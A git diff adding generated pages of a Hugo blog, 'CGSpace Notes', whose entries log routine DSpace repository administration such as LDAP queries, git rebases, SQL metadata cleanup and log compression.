+&lt;li&gt;Discuss how the migration of CGIAR&amp;rsquo;s Active Directory to a flat structure will break our LDAP groups in DSpace&lt;/li&gt;
+&lt;li&gt;We had been using &lt;code&gt;DC=ILRI&lt;/code&gt; to determine whether a user was ILRI or not&lt;/li&gt;
+&lt;li&gt;It looks like we might be able to use OUs now, instead of DCs:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b &amp;#34;dc=cgiarad,dc=org&amp;#34; -D &amp;#34;admigration1@cgiarad.org&amp;#34; -W &amp;#34;(sAMAccountName=admigration1)&amp;#34;
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>August, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-08/</link>
+      <pubDate>Mon, 01 Aug 2016 15:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-08/</guid>
+      <description>&lt;h2 id=&#34;2016-08-01&#34;&gt;2016-08-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add updated distribution license from Sisay (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/259&#34;&gt;#259&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;Play with upgrading Mirage 2 dependencies in &lt;code&gt;bower.json&lt;/code&gt; because most are several versions of out date&lt;/li&gt;
+&lt;li&gt;Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more&lt;/li&gt;
+&lt;li&gt;bower stuff is a dead end, waste of time, too many issues&lt;/li&gt;
+&lt;li&gt;Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of &lt;code&gt;fonts&lt;/code&gt;)&lt;/li&gt;
+&lt;li&gt;Start working on DSpace 5.1 → 5.5 port:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>July, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-07/</link>
+      <pubDate>Fri, 01 Jul 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-07/</guid>
+      <description>&lt;h2 id=&#34;2016-07-01&#34;&gt;2016-07-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Add &lt;code&gt;dc.description.sponsorship&lt;/code&gt; to Discovery sidebar facets and make investors clickable in item view (&lt;a href=&#34;https://github.com/ilri/DSpace/issues/232&#34;&gt;#232&lt;/a&gt;)&lt;/li&gt;
+&lt;li&gt;I think this query should find and replace all authors that have &amp;ldquo;,&amp;rdquo; at the end of their names:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &amp;#39;(^.+?),$&amp;#39;, &amp;#39;\1&amp;#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &amp;#39;^.+?,$&amp;#39;;
+ text_value
+------------
+(0 rows)
+&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
+&lt;li&gt;In this case the select query was showing 95 results before the update&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>June, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-06/</link>
+      <pubDate>Wed, 01 Jun 2016 10:53:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-06/</guid>
+      <description>&lt;h2 id=&#34;2016-06-01&#34;&gt;2016-06-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Experimenting with IFPRI OAI (we want to harvest their publications)&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html&#34;&gt;ContentDM documentation&lt;/a&gt; I found IFPRI&amp;rsquo;s OAI endpoint: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php&#34;&gt;http://ebrary.ifpri.org/oai/oai.php&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;After reading the &lt;a href=&#34;https://www.openarchives.org/OAI/openarchivesprotocol.html&#34;&gt;OAI documentation&lt;/a&gt; and testing with an &lt;a href=&#34;http://validator.oaipmh.com/&#34;&gt;OAI validator&lt;/a&gt; I found out how to get their publications&lt;/li&gt;
+&lt;li&gt;This is their publications set: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;amp;from=2016-01-01&amp;amp;set=p15738coll2&amp;amp;metadataPrefix=oai_dc&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;You can see the others by using the OAI &lt;code&gt;ListSets&lt;/code&gt; verb: &lt;a href=&#34;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&#34;&gt;http://ebrary.ifpri.org/oai/oai.php?verb=ListSets&lt;/a&gt;&lt;/li&gt;
+&lt;li&gt;Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in &lt;code&gt;dc.identifier.fund&lt;/code&gt; to &lt;code&gt;cg.identifier.cpwfproject&lt;/code&gt; and then the rest to &lt;code&gt;dc.description.sponsorship&lt;/code&gt;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>May, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-05/</link>
+      <pubDate>Sun, 01 May 2016 23:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-05/</guid>
+      <description>&lt;h2 id=&#34;2016-05-01&#34;&gt;2016-05-01&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Since yesterday there have been 10,000 REST errors and the site has been unstable again&lt;/li&gt;
+&lt;li&gt;I have blocked access to the API now&lt;/li&gt;
+&lt;li&gt;There are 3,000 IPs accessing the REST API in a 24-hour period!&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# awk &amp;#39;{print $1}&amp;#39; /var/log/nginx/rest.log  | uniq | wc -l
+3168
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>April, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-04/</link>
+      <pubDate>Mon, 04 Apr 2016 11:06:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-04/</guid>
+      <description>&lt;h2 id=&#34;2016-04-04&#34;&gt;2016-04-04&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit&lt;/li&gt;
+&lt;li&gt;We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc&lt;/li&gt;
+&lt;li&gt;After running DSpace for over five years I&amp;rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!&lt;/li&gt;
+&lt;li&gt;This will save us a few gigs of backup space we&amp;rsquo;re paying for on S3&lt;/li&gt;
+&lt;li&gt;Also, I noticed the &lt;code&gt;checker&lt;/code&gt; log has some errors we should pay attention to:&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>March, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-03/</link>
+      <pubDate>Wed, 02 Mar 2016 16:50:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-03/</guid>
+      <description>&lt;h2 id=&#34;2016-03-02&#34;&gt;2016-03-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at issues with author authorities on CGSpace&lt;/li&gt;
+&lt;li&gt;For some reason we still have the &lt;code&gt;index-lucene-update&lt;/code&gt; cron job active on CGSpace, but I&amp;rsquo;m pretty sure we don&amp;rsquo;t need it as of the latest few versions of Atmire&amp;rsquo;s Listings and Reports module&lt;/li&gt;
+&lt;li&gt;Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>February, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-02/</link>
+      <pubDate>Fri, 05 Feb 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-02/</guid>
+      <description>&lt;h2 id=&#34;2016-02-05&#34;&gt;2016-02-05&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Looking at some DAGRIS data for Abenet Yabowork&lt;/li&gt;
+&lt;li&gt;Lots of issues with spaces, newlines, etc causing the import to fail&lt;/li&gt;
+&lt;li&gt;I noticed we have a very &lt;em&gt;interesting&lt;/em&gt; list of countries on CGSpace:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;p&gt;&lt;img src=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2016/02/cgspace-countries.png&#34; alt=&#34;CGSpace country list&#34;&gt;&lt;/p&gt;
+&lt;ul&gt;
+&lt;li&gt;Not only are there 49,000 countries, we have some blanks (25)&amp;hellip;&lt;/li&gt;
+&lt;li&gt;Also, lots of things like &amp;ldquo;COTE D`LVOIRE&amp;rdquo; and &amp;ldquo;COTE D IVOIRE&amp;rdquo;&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>January, 2016</title>
+      <link>https://alanorth.github.io/cgspace-notes/2016-01/</link>
+      <pubDate>Wed, 13 Jan 2016 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2016-01/</guid>
+      <description>&lt;h2 id=&#34;2016-01-13&#34;&gt;2016-01-13&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Move ILRI collection &lt;code&gt;10568/12503&lt;/code&gt; from &lt;code&gt;10568/27869&lt;/code&gt; to &lt;code&gt;10568/27629&lt;/code&gt; using the &lt;a href=&#34;https://gist.github.com/alanorth/392c4660e8b022d99dfa&#34;&gt;move_collections.sh&lt;/a&gt; script I wrote last year.&lt;/li&gt;
+&lt;li&gt;I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.&lt;/li&gt;
+&lt;li&gt;Update GitHub wiki for documentation of &lt;a href=&#34;https://github.com/ilri/DSpace/wiki/Maintenance-Tasks&#34;&gt;maintenance tasks&lt;/a&gt;.&lt;/li&gt;
+&lt;/ul&gt;</description>
+    </item>
+    
+    <item>
+      <title>December, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-12/</link>
+      <pubDate>Wed, 02 Dec 2015 13:18:00 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-12/</guid>
+      <description>&lt;h2 id=&#34;2015-12-02&#34;&gt;2015-12-02&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;Replace &lt;code&gt;lzop&lt;/code&gt; with &lt;code&gt;xz&lt;/code&gt; in log compression cron jobs on DSpace Test—it uses less space:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+    <item>
+      <title>November, 2015</title>
+      <link>https://alanorth.github.io/cgspace-notes/2015-11/</link>
+      <pubDate>Mon, 23 Nov 2015 17:00:57 +0300</pubDate>
+      
+      <guid>https://alanorth.github.io/cgspace-notes/2015-11/</guid>
+      <description>&lt;h2 id=&#34;2015-11-22&#34;&gt;2015-11-22&lt;/h2&gt;
+&lt;ul&gt;
+&lt;li&gt;CGSpace went down&lt;/li&gt;
+&lt;li&gt;Looks like DSpace exhausted its PostgreSQL connection pool&lt;/li&gt;
+&lt;li&gt;Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:&lt;/li&gt;
+&lt;/ul&gt;
+&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ psql -c &amp;#39;SELECT * from pg_stat_activity;&amp;#39; | grep idle | grep -c cgspace
+78
+&lt;/code&gt;&lt;/pre&gt;</description>
+    </item>
+    
+  </channel>
+</rss>
diff --git a/docs/posts/page/1/index.html b/docs/posts/page/1/index.html
new file mode 100644
index 000000000..8da731956
--- /dev/null
+++ b/docs/posts/page/1/index.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en-us">
+  <head>
+    <title>https://alanorth.github.io/cgspace-notes/posts/</title>
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+    <meta name="robots" content="noindex">
+    <meta charset="utf-8">
+    <meta http-equiv="refresh" content="0; url=https://alanorth.github.io/cgspace-notes/posts/">
+  </head>
+</html>
diff --git a/docs/posts/page/10/index.html b/docs/posts/page/10/index.html
new file mode 100644
index 000000000..bbaf5fcc7
--- /dev/null
+++ b/docs/posts/page/10/index.html
@@ -0,0 +1,325 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-04/">April, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-04-04T11:06:00+03:00">Mon Apr 04, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-04-04">2016-04-04</h2>
+<ul>
+<li>Looking at log file use on CGSpace and notice that we need to work on our cron setup a bit</li>
+<li>We are backing up all logs in the log folder, including useless stuff like solr, cocoon, handle-plugin, etc</li>
+<li>After running DSpace for over five years I&rsquo;ve never needed to look in any other log file than dspace.log, leave alone one from last year!</li>
+<li>This will save us a few gigs of backup space we&rsquo;re paying for on S3</li>
+<li>Also, I noticed the <code>checker</code> log has some errors we should pay attention to:</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-04/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-03/">March, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-03-02T16:50:00+03:00">Wed Mar 02, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-03-02">2016-03-02</h2>
+<ul>
+<li>Looking at issues with author authorities on CGSpace</li>
+<li>For some reason we still have the <code>index-lucene-update</code> cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module</li>
+<li>Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-03/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-02/">February, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-02-05T13:18:00+03:00">Fri Feb 05, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-02-05">2016-02-05</h2>
+<ul>
+<li>Looking at some DAGRIS data for Abenet Yabowork</li>
+<li>Lots of issues with spaces, newlines, etc causing the import to fail</li>
+<li>I noticed we have a very <em>interesting</em> list of countries on CGSpace:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/02/cgspace-countries.png" alt="CGSpace country list"></p>
+<ul>
+<li>Not only are there 49,000 countries, we have some blanks (25)&hellip;</li>
+<li>Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-02/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-01/">January, 2016</a></h2>
+    <p class="blog-post-meta"><time datetime="2016-01-13T13:18:00+03:00">Wed Jan 13, 2016</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-01-13">2016-01-13</h2>
+<ul>
+<li>Move ILRI collection <code>10568/12503</code> from <code>10568/27869</code> to <code>10568/27629</code> using the <a href="https://gist.github.com/alanorth/392c4660e8b022d99dfa">move_collections.sh</a> script I wrote last year.</li>
+<li>I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.</li>
+<li>Update GitHub wiki for documentation of <a href="https://github.com/ilri/DSpace/wiki/Maintenance-Tasks">maintenance tasks</a>.</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2016-01/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-12/">December, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-12-02T13:18:00+03:00">Wed Dec 02, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-12-02">2015-12-02</h2>
+<ul>
+<li>Replace <code>lzop</code> with <code>xz</code> in log compression cron jobs on DSpace Test—it uses less space:</li>
+</ul>
+<pre tabindex="0"><code># cd /home/dspacetest.cgiar.org/log
+# ls -lh dspace.log.2015-11-18*
+-rw-rw-r-- 1 tomcat7 tomcat7 2.0M Nov 18 23:59 dspace.log.2015-11-18
+-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
+-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-12/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2015-11/">November, 2015</a></h2>
+    <p class="blog-post-meta"><time datetime="2015-11-23T17:00:57+03:00">Mon Nov 23, 2015</time> by Alan Orth in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2015-11-22">2015-11-22</h2>
+<ul>
+<li>CGSpace went down</li>
+<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
+<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
+78
+</code></pre>
+  <a href='https://alanorth.github.io/cgspace-notes/2015-11/'>Read more →</a>
+</article> 
+
+
+
+
+
+<nav class="blog-pagination">
+  
+  
+  <a class="btn btn-outline-primary" href="/cgspace-notes/posts/page/9/" rel="prev" role="button">Previous page</a>
+  <a class="btn btn-outline-primary disabled" href="#" role="button" aria-disabled="true">Next page</a>
+  
+  
+</nav>
+
+
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/posts/page/2/index.html b/docs/posts/page/2/index.html
new file mode 100644
index 000000000..d21c3b19c
--- /dev/null
+++ b/docs/posts/page/2/index.html
@@ -0,0 +1,449 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="Posts" />
+<meta property="og:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository." />
+<meta property="og:type" content="website" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/posts/" />
+<meta property="og:updated_time" content="2023-07-01T17:17:31+03:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="Posts"/>
+<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "Blog",
+  "headline": "CGSpace Notes",
+  "url" : "https://alanorth.github.io/cgspace-notes/posts/",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "dateModified": "2023-07-01T17:14:36+03:00",
+  "keywords": "notes, migration, notes",
+  "description":"Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."
+}
+</script>
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/posts/">
+
+    <title>CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    <link rel="alternate" type="application/rss+xml" href="https://alanorth.github.io/cgspace-notes/posts/index.xml" title="CGSpace Notes" />
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-09/">September, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-09-01T09:41:36+03:00">Thu Sep 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-09-01">2022-09-01</h2>
+<ul>
+<li>A bit of work on the &ldquo;Mapping CG Core–CGSpace–MEL–MARLO Types&rdquo; spreadsheet</li>
+<li>I tested an item submission on DSpace Test with the Cocoon <code>org.apache.cocoon.uploads.autosave=false</code> change
+<ul>
+<li>The submission works as expected</li>
+</ul>
+</li>
+<li>Start debugging some region-related issues with csv-metadata-quality
+<ul>
+<li>I created a new test file <code>test-geography.csv</code> with some different scenarios</li>
+<li>I also fixed a few bugs and improved the region-matching logic</li>
+</ul>
+</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-09/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2022-08/">August, 2022</a></h2>
+    <p class="blog-post-meta"><time datetime="2022-08-01T10:22:36+03:00">Mon Aug 01, 2022</time> by Alan Orth in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2022-08-01">2022-08-01</h2>
+<ul>
+<li>Our request to add <a href="https://github.com/spdx/license-list-XML/issues/1525">CC-BY-3.0-IGO to SPDX</a> was approved a few weeks ago</li>
+</ul>
+  <a href='https://alanorth.github.io/cgspace-notes/2022-08/'>Read more →</a>
+</article> 
+
+
+
+
+
+
+<article class="blog-post">
+  <header>
